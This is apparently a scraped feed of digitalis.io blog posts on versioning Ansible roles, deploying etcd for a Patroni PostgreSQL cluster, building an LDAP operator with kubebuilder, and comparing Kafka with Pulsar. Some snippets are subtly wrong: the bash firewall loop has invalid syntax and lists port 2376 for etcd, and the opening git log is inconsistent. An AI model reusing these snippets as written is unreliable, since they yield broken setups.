[(hotfix/2.0.1)]$ git commit -am 'hotfix: fixing something broken'
[hotfix/2.0.1 3cda6d4] hotfix: fixing something broken
1 file changed, 1 insertion(+)
[(hotfix/2.0.1)]$ git push -u origin hotfix/2.0.1
Counting objects: 3, done.
Writing objects: 100% (3/3), 258 bytes | 0 bytes/s, done.
Total 3 (delta 0), reused 0 (delta 0)
To git@localhost:sample-repo.git
* [new branch] hotfix/2.0.1 -> hotfix/2.0.1
Branch hotfix/1.0.1 set up to track remote branch hotfix/2.0.1 from origin.
[(hotfix/1.0.1)]$ git tag 1.0.1
[(hotfix/1.0.1)]$ git push --tags
Counting objects: 1, done.
Writing objects: 100% (1/1), 156 bytes | 0 bytes/s, done.
Total 1 (delta 0), reused 0 (delta 0)
To git@localhost:sample-repo.git
* [new tag] 1.0.1 -> 1.0.1
* [new tag] 3.0.0 -> 3.0.0
Before we can talk about versioning our code, let’s take it apart. There are three areas where we do versioning separately:
When making changes to Ansible code you will most likely be updating one or more of the above resources. We therefore need to keep track of everything keeping in mind that some areas like the roles are shared between deployments.
We separated the roles from the rest of the playbook. Each role is a git repository in its own right with a git tag for versioning. And we use ansible-galaxy at runtime to download the required versions every time the playbook is run.
Ansible Galaxy uses a simple yaml configuration file to list all the roles. Whilst you can use Ansible Tower or AWX this is not required. This is the prefer approach as it decreases the complexity and the number of servers we need to support.
- src: [email protected]:mygroup/ansible-role-nginx.git
scm: git
version: "1.0.0"
- src: [email protected]:mygroup/ansible-role-apache.git
scm: git
version: "1.3.0"
- src: [email protected]:mygroup/ansible-role-cassandra.git
scm: git
version: "feature/AAABBB"
Versions can be either a branch name or a tag. This adds the flexibility to test new features in the development environment without the need to update the requirements.yml file every time with a new tag.
Each of your roles will also need to be configured for Galaxy. It needs an additional file, meta/main.yml with a format like
---
galaxy_info:
author: Sergio Rua <[email protected]>
description: Digitalis Role for Blog
company: Digitalis.IO
license: Apache Licese 2.0
min_ansible_version: 2.9
platforms:
- name: RedHat
versions:
- all
- name: Debian
versions:
- all
galaxy_tags:
- digitalis
- blog
dependencies: []
If your role requires another one to run (dependent), you can add them to the dependencies section. You can also use SCM here for downloading the roles, though I would not recommend this as it will clash with the config in requirements.yml and you will end up having to maintain two different configurations.
dependencies:
- role: foo
src: [email protected]:MyOrg/ansible-foo
scm: git
version: 0.1.0
The screenshot below represents a sample deployment which we refer to a product. You may have noticed there are no roles defined in this directory. We have the different variables, the tasks and finally the requirements.yml. As explained above, we keep them on their own git repositories and we include them with Ansible Galaxy on demand.
The product git repository is tagged every time any of the files it contains changes (except during development when we use branches) and this becomes the version we control to keep track of changes into our different environments.
We now have the two main components joined up.
As you can see in the diagram below we have one single version for the whole product, which in turn contains all the roles with their versions. Whenever we make a change we will always need to update the product repository and therefore a new version (tag) is created
The best way in this scenario is to either have one playbook git repository per environment (preferred option) or to have one per environment.
Be aware that multiple is probably a good idea for large deployments but it can be quite painful to keep environments in sync. Many times I have seen the versions between environments become very different and unfortunately there is no magic pill to fix this other than to ensure there are good practices and that the whole team follows them. Automation is key.
When using Ansible with Ansible Galaxy for role management there is an extra step before you can run the playbook which is downloading all roles referenced in the requirements.yml. This is done using the ansible-galaxy command:
ansible-galaxy install -r requirements.yml
There are a couple of additional options worth mentioning:
We prefer to automate as much as we can, including running Ansible. Also we don’t encourage manual intervention. What I mean is we try not to log into servers whenever possible and use centralised tools such as Jenkins and Rundeck to run any command on the servers.
There are many advantages to automation tools such as Jenkins and Rundeck. To list a few:
Pretty much everyone is reluctant to introduce versioning into their code. After all, commit to master and run Ansible, what’s the worst that could happen? The worst will happen, it is only a matter of time. The good news is that implementing good DevOps principals is easy and once you build your automation around it, it becomes easy to manage.
The next time you need to rollback your code you will be grateful you can do so without having to cherry pick your last 100 git commits.
Be safe.
If you would like to know more about how to implement modern data and cloud technologies, into to your business, we at Digitalis do it all: from cloud migration to fully managed services, we can help you modernize your operations, data, and applications. We provide consulting and managed services on cloud, data, and DevOps for any business type. Contact us today for more information or learn more about each of our services here.
Senior DevOps Engineer
Sergio has many years experience working on various development projects before joining Digitalis. He worked for large companies with complex networks and infrastructure. ‘This has helped Sergio gain lots of experience in multiple areas from programming to networks. He especially excels in DevOps: automation is his day-to-day and Kubernetes his passion.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
The post Ansible Versioning appeared first on digitalis.io.
]]>The post Deploying PostgreSQL for High Availability with Patroni, etcd and HAProxy – Part 1 appeared first on digitalis.io.
]]>In the first of a series of blogs on deploying PostgreSQL for High Availability (HA), we show how this can be done by leveraging technologies such as Patroni, etcd and HAProxy.
This blog gives an introduction to the relevant technologies and starts with showing how to deploy etcd as the distributed configuration store that Patroni will subsequently use for HA. Subsequent blogs will show how to configure Patroni, HAProxy and PostgreSQL
The second part of this blog can be found here.
For demonstration purposes the examples show how to manually install and configure the relevant components. However it is highly recommended to follow standard DevOps practices and use a configuration management tool such as Ansible or any other tool to install and configure the various software packages and OS.
If you would like to know more about how to implement modern data and cloud technologies, such as PostgreSQL, into to your business, we at Digitalis do it all: from cloud migration to fully managed services, we can help you modernize your operations, data, and applications. We provide consulting and managed services on cloud, data, and DevOps for any business type. Contact us today for more information.
Patroni is an automatic failover system for PostgreSQL built by Zalando. It provides automatic or manual failover and keeps all of the vital data stored into a distributed configuration store (DCS) that can be one of etcd, zookeeper, consul or a pure python RAFT implementation based on the library pysyncobj. Patroni is available either as a pip package or via the official RPM/DEB PostgreSQL repositories.
When Patroni runs on the top of the primary node it stores a token into the DCS. The token has a limited TTL measurable in seconds. If the primary node becomes unavailable then the token expires and patroni on the followers via the DCS initiates the election of a new primary.
When the old primary comes back on line then it discovers that the token is held by another node and patroni transforms the old primary into the follower of the new primary automatically.
The database connections do not happen directly to the database nodes but are routed via a connection proxy like HAProxy or pgbouncer. This proxy, by querying the patroni rest api, determines the active node.
It’s then clear that by using Patroni the risk of having a split brain scenario is very limited.
However by using patroni a DBA needs to surrender completely the manual database administration to patroni because all the dynamic settings are stored into the DCS in order to have complete consistency on the participating nodes.
In this blog post we’ll see how to build a Patroni cluster on the top of CentOS 7 by using etcd in clustering and HAProxy active on each database node capable of routing the database connection automatically to the primary, whatever node we decide to connect to.
In order to set up PostgreSQL and Patroni we need to add the official pgdg (PostgreSQL Global Development Group) yum repository to CentOS.
The PostgreSQL website has an easy to use wizard to grab the commands depending on the distribution in use at the url https://www.postgresql.org/download/linux/redhat/ .
For CentOS 7 adding the yum repository is simple as that.
sudo yum install -y https://download.postgresql.org/pub/repos/yum/reporpms/EL-7-x86_64/pgdg-redhat-repo-latest.noarch.rpm
We can now install the PostgreSQL 13 binaries by running the following command.
sudo yum install -y postgresql13-server postgresql13-server postgresql13 postgresql13-contrib
In order to use the packaged version of patroni we need to install the epel-release provides additional packages required by patroni
sudo yum install -y epel-release
Finally we can install the following packages
The CentOS base installation needs to be configured to prevent firewalld and selinux that need to be adjusted before configuring our Patroni cluster.
For firewalld we need to open the ports required by etcd, PostgreSQL, HAProxy and the Patroni REST api.
For selinux we need to enable the flag enabling HAProxy binding to the ip addresses.
The ports required for operating patroni/etcd/haproxy/postgresql are the following.
Enabling the ports is very simple and can be automated via script or ansible using the firewalld module.
By using bash it is possible to enable the ports with a simple for loop.
for service_port in (5432 6432 2380 2376 8008 7000)
do
sudo firewall-cmd --permanent --zone=public --add-port=${service_port}/tcp
done
sudo systemctl reload firewalld
selinux by default prevents the new services to bind to all the ip addresses.
In order to allow HAProxy to bind the ports required for its functionality we need to run this command.
sudo setsebool -P haproxy_connect_any=1
For our example we are using three virtualbox virtual machines. Each machine has two network interfaces. The first interface is bridged on the host network adapter and is used for internet access. The second interface is connected to the host only network provided by virtualbox and used for inter communication between the machines.
The second interface network is configured with a static ip address and each node has the hosts file configured with the other hosts ip names resolved to machine names.
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
192.168.56.40 patroni01
192.168.56.41 patroni02
192.168.56.42 patroni03
We are now ready to configure etcd to work as a cluster of three nodes.
For doing so we need to edit the file in /etc/etcd/etcd.conf and modify the following variables.
ETCD_LISTEN_PEER_URLS="http://192.168.56.40:2380"
ETCD_LISTEN_CLIENT_URLS="http://192.168.56.40:2379"
ETCD_NAME="patroni01"
ETCD_INITIAL_ADVERTISE_PEER_URLS="http://192.168.56.40:2380"
ETCD_ADVERTISE_CLIENT_URLS="http://192.168.56.40:2379"
ETCD_INITIAL_CLUSTER="patroni01=http://192.168.56.40:2380,patroni02=http://192.168.56.41:2380,patroni03=http://192.168.56.42:2380"
All the variables except ETCD_INITIAL_CLUSTER are machine specific and must be set accordingly with the machine name and ip address.
The variable ETCD_INITIAL_CLUSTER is a comma separated values list of the hosts participating in the etcd cluster.
After configuring etcd on each node we can enable and start the service.
sudo systemctl enable etcd
sudo systemctl start etcd
We can check the cluster’s health status with the following command.
etcdctl --endpoints http://patroni01:2379 cluster-health
member 75e96c8926bc6382 is healthy: got healthy result from http://192.168.56.40:2379
member 7c1dfc5e13a8008a is healthy: got healthy result from http://192.168.56.42:2379
member c920522ba9a75e17 is healthy: got healthy result from http://192.168.56.41:2379
cluster is healthy
We’ve seen how to configure a three node etcd cluster on the patroni nodes. This example configuration is made of three members.
In the next posts we’ll see how to configure and initialise a patroni cluster using the DCS (etcd) running on the database nodes and how to setup HAProxy for routing efficiently the database connections to the active leader.
If you want to understand how to easily ingest data from Kafka topics into Cassandra than this blog can show you how with the DataStax Kafka Connector.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
The post Deploying PostgreSQL for High Availability with Patroni, etcd and HAProxy – Part 1 appeared first on digitalis.io.
]]>The post Kubernetes Operators pros and cons – the good, the bad and the ugly appeared first on digitalis.io.
]]>When you use Kubernetes to deploy an application, say a Deployment, you are calling the underlying Kubernetes API which hands over your request to an application and applies the config as you requested via the Yaml configuration file.
apiVersion: apps/v1
kind: Deployment
metadata:
name: nginx-deployment
labels:
app: nginx
spec:
[...]
In this example, Deployment is part of the default K8s server but there are many others you are probably using that are not and you installed beforehand. For example, if you use a nginx ingress controller on your server you are installing an API (kind: Ingress) to modify the behaviour of nginx every time you configure a new web entry point.
The role of the controller is to track a resource type until it achieves the desired state. For example, another built-in controller is the Pod kind. The controller will loop over itself ensuring the Pod reaches the Running state by starting the containers configured in it. It will usually accomplish the task by calling an API server.
We can find three important parts of any controller:
Kubernetes Operators offer a way to extend the functionality of Kubernetes beyond its basics. This is especially interesting for complex applications which require intrinsic knowledge of the functionality of the application to be installed. We saw a good example earlier with the Ingress controller. Others are databases and stateful applications.
It can also reduce the complexity and length of the configuration. If you look for example at the postgres operator by Zalando you can see that with only a few lines you can spin up a fully featured cluster
apiVersion: "acid.zalan.do/v1"
kind: postgresql
metadata:
name: acid-minimal-cluster
namespace: default
spec:
teamId: "acid"
volume:
size: 1Gi
numberOfInstances: 2
users:
zalando: # database owner
- superuser
- createdb
foo_user: [] # role for application foo
databases:
foo: zalando # dbname: owner
preparedDatabases:
bar: {}
postgresql:
version: "13"
The bad
The worst thing in my opinion is that it can lead to abuse and overuse.
You should only use an operator if the functionality cannot be provided by Kubernetes. K8s operators are not a way of packaging applications, they are extensions to Kubernetes. I often see community projects for K8s Operators I would easily replace with a helm chart, in most cases a much better option
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
# name must match the spec fields below, and be in the form: <plural>.<group>
name: crontabs.stable.example.com
spec:
# group name to use for REST API: /apis/<group>/<version>
group: stable.example.com
# list of versions supported by this CustomResourceDefinition
versions:
- name: v1
# Each version can be enabled/disabled by Served flag.
served: true
# One and only one version must be marked as the storage version.
storage: true
schema:
openAPIV3Schema:
type: object
properties:
spec:
type: object
properties:
cronSpec:
type: string
image:
type: string
replicas:
type: integer
# either Namespaced or Cluster
scope: Namespaced
names:
# plural name to be used in the URL: /apis/<group>/<version>/<plural>
plural: crontabs
# singular name to be used as an alias on the CLI and for display
singular: crontab
# kind is normally the CamelCased singular type. Your resource manifests use this.
kind: CronTab
# shortNames allow shorter string to match your resource on the CLI
shortNames:
- ct
The good news is you may never have to. Enter kubebuilder. Kubebuilder is a framework for building Kubernetes APIs. I guess it is not dissimilar to Ruby on Rails, Django or Spring.
I took it out for a test and created my first API and controller 🎉
I have Kubernetes running on my laptop with minikube. There I installed OpenLDAP and I got to work to see if I could manage the LDAP users and groups from Kubernetes.
For my project I need to create two APIs, one for managing users and another for groups. Let’s initialise it create the APIs:
kubebuilder init --domain digitalis.io --license apache2 --owner "Digitalis.IO"
kubebuilder create api --group ldap --version v1 --kind LdapUser
kubebuilder create api --group ldap --version v1 --kind LdapGroup
These commands create everything I need to get started. Have a good look to the directory tree from where I would highlight these three folders:
api: it contains a sub directory for each of the api versions you are writing code for. In our example you should only see v1
config: all the yaml files required to set up the controller when installing in Kubernetes, chief among them the CRD.
controller: the main part where you write the code to Reconcile
The next part is to define the API. Using kubebuilder rather than having to edit the CRD manually you just need to add your code and kubebuilder will generate them for you.
If you look into the api/v1 directory you’ll find the resource type definitions for users and groups:
type LdapUserSpec struct {
Username string `json:"username"`
UID string `json:"uid"`
GID string `json:"gid"`
Password string `json:"password"`
Homedir string `json:"homedir,omitempty"`
Shell string `json:"shell,omitempty"`
}
For example I have defined my users with these struct and the groups with:
type LdapGroupSpec struct {
Name string `json:"name"`
GID string `json:"gid"`
Members []string `json:"members,omitempty"`
}
Once you have your resources defined just run make install and it will generate and install the CRD into your Kubernetes cluster.
The truth is kubebuilder does an excellent job. After defining my API I just needed to update the Reconcile functions with my code and voila. This function is called every time an object (user or group in our case) is added, removed or updated. I’m not ashamed to say it took me probably 3 times longer to write up the code to talk to the LDAP server.
func (r *LdapGroupReconciler) Reconcile(req ctrl.Request) (ctrl.Result, error) {
ctx := context.Background()
log := r.Log.WithValues("ldapgroup", req.NamespacedName)
[...]
}
My only complication was with deleting. On my first version the controller was crashing because it could not find the object to delete and without that I could not delete the user/group from LDAP. I found the answer in finalizer.
A finalizer is added to a resource and it acts like a pre-delete hook. This way the code captures that the user has requested the user/group to be deleted and it can then do the deed and reply back saying all good, move along. Below is the relevant code adapted from the kubebuilder book with extra comments:
//! [finalizer]
ldapuserFinalizerName := "ldap.digitalis.io/finalizer"
// Am I being deleted?
if ldapuser.ObjectMeta.DeletionTimestamp.IsZero() {
// No: check if I have the `finalizer` installed and install otherwise
if !containsString(ldapuser.GetFinalizers(), ldapuserFinalizerName) {
ldapuser.SetFinalizers(append(ldapuser.GetFinalizers(), ldapuserFinalizerName))
if err := r.Update(context.Background(), &ldapuser); err != nil {
return ctrl.Result{}, err
}
}
} else {
// The object is being deleted
if containsString(ldapuser.GetFinalizers(), ldapuserFinalizerName) {
// our finalizer is present, let's delete the user
if err := ld.LdapDeleteUser(ldapuser.Spec); err != nil {
log.Error(err, "Error deleting from LDAP")
return ctrl.Result{}, err
}
// remove our finalizer from the list and update it.
ldapuser.SetFinalizers(removeString(ldapuser.GetFinalizers(), ldapuserFinalizerName))
if err := r.Update(context.Background(), &ldapuser); err != nil {
return ctrl.Result{}, err
}
}
// Stop reconciliation as the item is being deleted
return ctrl.Result{}, nil
}
//! [finalizer]
I created some test code. It’s very messy, remember this is just a learning exercise and it’ll break apart if you try to use it. There are also lots of duplications in the LDAP functions but it serves a purpose.
You can find it here: https://github.com/digitalis-io/ldap-accounts-controller
This controller will talk to a LDAP server to create users and groups as defined on my CRD. As you can see below I have now two Kinds defined, one for LDAP users and one for LDAP groups. As they are registered on Kubernetes by the CRD it will tell it to use our controller.
apiVersion: ldap.digitalis.io/v1
kind: LdapUser
metadata:
name: user01
spec:
username: user01
password: myPassword!
gid: "1000"
uid: "1000"
homedir: /home/user01
shell: /bin/bash
apiVersion: ldap.digitalis.io/v1
kind: LdapGroup
metadata:
name: devops
spec:
name: devops
gid: "1000"
members:
- user01
- "90000"
LDAP_BASE_DN="dc=digitalis,dc=io"
LDAP_BIND="cn=admin,dc=digitalis,dc=io"
LDAP_PASSWORD=xxxx
LDAP_HOSTNAME=ldap_server_ip_or_host
LDAP_PORT=389
LDAP_TLS="false"
make install run
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
The post Kubernetes Operators pros and cons – the good, the bad and the ugly appeared first on digitalis.io.
]]>The post Apache Kafka vs Apache Pulsar appeared first on digitalis.io.
]]>Digitalis has extensive experience in designing, building and maintaining data streaming systems across a wide variety of use cases – on premises, all cloud providers and hybrid. If you would like to know more or want to chat about how we can help you, please reach out.
When we talk about streaming data systems it’s hard to ignore Apache Kafka. Its adoption has risen dramatically over the last five years. The ecosystem around it has grown too. While Kafka dominates the online talks, meetups and conference agendas, there are other streaming platforms that exist.
In this blog post I’m going to compare Apache Kafka and Apache Pulsar. By the end of this post you should have a good comparison of the two platforms. I will cover the core components and some of the common requirements of any streaming platform.
Within both Kafka and Pulsar is a broker architecture, these handle incoming messages from producers and then handle the messages that are handled by the consumers. When it comes to the messages, with Kafka the messages are pulled from the Kafka brokers to the consumers. In Pulsar it’s the other way around, they are pushed to the subscribing consumers.
One of the major advantages of Pulsar over Kafka is around the number of topics you can produce. There are hard limitations on a Kafka cluster when it comes to partitions, a limit of 4000 partitions per broker and a total of 200,000 across the entire cluster, there will be a time when you cannot create more topics. Pulsar doesn’t suffer from this limitation, you can scale with millions of topics as the data is not stored within the brokers themselves but externally in Bookkeeper nodes.
Both systems use Apache Zookeeper for cluster coordination. Kafka, at present, uses Zookeeper for metadata on topic configuration and access control lists (ACLs), Pulsar uses Zookeeper for the same purposes.
With KIP-500 improvement proposal, the removal of Zookeeper in Kafka will happen – it’s currently being tested. This means that Kafka will operate on it’s own, only relying on the operating brokers for all the cluster metadata. It’s worth noting that Kafka can still be run in “legacy mode” if you still want to have Zookeeper handle its metadata.
For me Pulsar wins the replication battle, it provides geo-replication out of the box. A replicated cluster can be created across multiple data centers. Applications can be blocked from consuming from local clusters until messages have been replicated and acknowledged.
Kafka has two methods for replication, Mirror Maker 2 or Confluent Replicator. If you are using the Apache Kafka distribution then you have Mirror Maker 2, it works well but takes time to configure. If you have purchased a Confluent licence then Replicator is available to you as a standalone application or a connector running on a Kafka Connect node.
Offset handling is incredibly difficult to achieve with replicated Kafka, with some custom API coding required in applications to read from the replicated cluster. Pulsar doesn’t suffer from these problems. It’s worth pointing out that multi DC operation is coming to the Confluent Platform in the future but will be part of the paid for licence.
If you have used Kafka then you will be aware of the properties configuration and the adding of bootstrap servers, broker lists or Zookeeper nodes depending on the operation you are doing. When new brokers are added then properties need amending with the new addresses appended to the configuration.
Pulsar provides a proxy layer to address the cluster with a single address. This is a huge advantage over Kafka especially when you are deploying with frameworks such as Kubernetes where direct access to the brokers is not possible. Another win is that you are allowed to run as many Pulsar proxies as you wish and they can be accessed via a single point with a load balancer. For cloud based deployments this makes managing and accessing the cluster easy.
As message frequencies increase then there comes a time when you have to scale up the cluster to accommodate the volume of messages. With Kafka this means adding more brokers to the cluster. Adding new brokers to Kafka is not an easy task, this is something Pulsar is far superior to. With Kafka the broker is added to the cluster and then the manual process of repartitioning and replicating the message data to the new broker is done. Depending on the message volumes this can take a lot of time.
Where Kafka uses the brokers for storage, Pulsar uses Apache Bookkeeper and not in the brokers themselves. The main difference is that Pulsar is storing unacknowledged messages, replication and separating the message persistence from the brokers.
With Pulsar if you want to increase message capacity then you add as many Bookkeeper instances as you require without having to add the equivalent number of brokers (as you would with Kafka).
Pulsar provides the option to use non persistent topics in memory, with no data being written to disk. Note however, if the Pulsar broker disconnects from the cluster then those messages and non persistent topics will be lost, whether it is stored in the broker or in transit to the consumer
Language | Kafka Client | Pulsar Client |
C | ✔ | |
Clojure | ✔ | Using Java Interop |
C# / .Net | ✔ | ✔ |
Go | ✔ | ✔ |
Groovy | ✔ | |
Java | ✔ | ✔ |
Spring Boot | ✔ | |
Kotlin | ✔ | |
Node.js | ✔ | |
Python | ✔ | ✔ |
Ruby | ✔ | |
Rust | ✔ | |
Scala | ✔ |
While there are various Kafka client libraries available it’s worth taking the time to study the Kafka features they support, not all aspects of the Kafka APIs are covered in the client libraries. For example if you want to handle Kafka’s Streaming API, only Java covers that API.
One of the interesting bonuses of the Pulsar client Java libraries is that they drop in to existing Kafka producer and consumer code. The only thing that you need to do is update the client dependency in Maven. This gives you an excellent way to evaluate Pulsar without having to refactor all your code.
There are some differences between Pulsar and Kafka when it comes to reading messages. Kafka is an immutable log, with the offset controlling which is the latest message the consumer would read from. If you don’t want to get in the detail of committing your own offsets then you can let the Kafka client API do that for you.
With Pulsar you have a choice of two consuming methods:
For anyone who remembers writing producers and consumers that handled database data, it was a difficult process and difficult to scale.
Within Kafka the Kafka Connect system provided a convenient method of either sourcing data to topics or persisting data to a sink.
Apache Pulsar has a similar method called Pulsar IO. It has the same source/sink method of acquiring data or persisting it. The disadvantage here is the support for those external systems.
For some systems such as Apache Cassandra, both systems are supported. If it’s JDBC operations that you want to do, once again both are supported well. Other open source systems like Flume, Debezium, Hadoop HDFS, Solr and ElasticSearch are supported by both systems. There are far more supported vendors for Kafka Connect than there are for Pulsar IO. While you can write your own plugins it is far easier to use an off the shelf one. In terms of connector availability Kafka Connect is an easy choice.
Please note that not all connectors for Kafka are free, some of them you will have to purchase with a licence from Confluent (the commercial arm of Kafka).
If the ease of availability and implementation is important to you then the Kafka connector support is far superior to the Pulsar option.
Using SQL like queries on message streams can speed up the development of basic applications and bypassing any code development being required. These SQL engines also make the use of aggregating data (counting frequencies of certain keys, averages and so on) very easy.
There are SQL engines for both Kafka and Pulsar. The Kafka KSQL engine is a standalone product produced by Confluent and does not come with the Apache Kafka binaries. It is licenced under the Conflent Community Licence.
Apache Pulsar uses the Presto SQL engine to query messages with a schema stored in its schema register. Messages are required to be ingested first and then queried, where KSQL streams the data in the same way a Streaming API application would continuously run and apply the queries.
While there are a few issues with KSQL once you go beyond the basics, I prefer it over Pulsar’s read and then query mechanism.
The ability to store old data beyond the retention period of the brokers is one that’s often overlooked. It has become more important as machine learning is being used on the data for recommendation systems, or replaying the data as a system of a record.
Before Kafka Connect it was common for developers to write their own streaming jobs to persist to the likes of Amazon S3 or other types of storage buckets. Tiered storage appeared in Kafka only recently and is only available in the Confluent Kafka Platform 6.0.0 onwards as a paid for option. Persistence is to Amazon S3, Google Cloud Storage or Pure Storage FlashBlade.
Pulsar offers tiered storage as part of the open source distribution, using the Apache JCloud framework to store data to Amazon S3 or Google Cloud Storage, with other vendors planned for the future. The fact that the tiered storage is available for free and out of the box is a huge advantage for Pulsar against Kafka.
While comparing the feature and technological aspects of Kafka and Pulsar, to me, the biggest differentiator is the community support. Everyone has questions, everyone looks for help at some point and it’s something that the Kafka community have managed to excel on, the time investment has certainly paid off.
The support in the Confluent Slack channels is excellent (if you’re not a member and you’re using Kafka, I strongly suggest you join). There are lots of meetups available online covering various aspects of the Kafka ecosystem, there is plenty going on.
Unfortunately Pulsar still has a small (but growing) community, so it can be difficult to find answers. The Kafka community support wins hands down. If it is to compete with Kafka going forward then this is the area I feel it needs to focus on the most.
As you would expect there are parts of Pulsar that shine and there are parts of Kafka that also shine. When it comes to connectivity to external sources and simple querying of the message data then Kafka definitely comes out on top.
The more core elements of the broker systems, Pulsar offers a lot upfront, especially when it comes to using Bookies for expanding persistent storage and the ability to use tiered storage out of the box for free. If you are using frameworks like Kubernetes for deployment then Pulsar’s proxy addressing makes broker access far easier and can be load balanced if you are running multiple proxies. Pulsar also wins on multi datacenter replication out of the box, the ability to block consumers until a message is populated fully is a big benefit.
If the features that Pulsar provides are important to you then you really should consider Pulsar – its ease of scale, tiered storage and multi-dc support are compelling features for any streaming application.
However, community support is vitally important also. Access to help when you need it and getting answers from those who have already done those tasks is immensely advantageous when you are deploying a streaming message system. Confluent has invested heavily in supporting the Kafka community and its ecosystem. At this point I would advise anyone wanting to learn and get up and running quickly to consider Kafka.
DevOps Engineer and Developer
With over 30 years’ of experience in software, customer loyalty data and big data, Jason now focuses his energy on Kafka and Hadoop. He is also the author of Machine Learning: Hands on for Developers and Technical Professionals. Jason is considered a stalwart in the Kafka community. Jason is a regular speaker on Kafka technologies, AI and customer and client predictions with data.
If you want to understand how to easily ingest data from Kafka topics into Cassandra than this blog can show you how with the DataStax Kafka Connector.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
The post Apache Kafka vs Apache Pulsar appeared first on digitalis.io.
]]>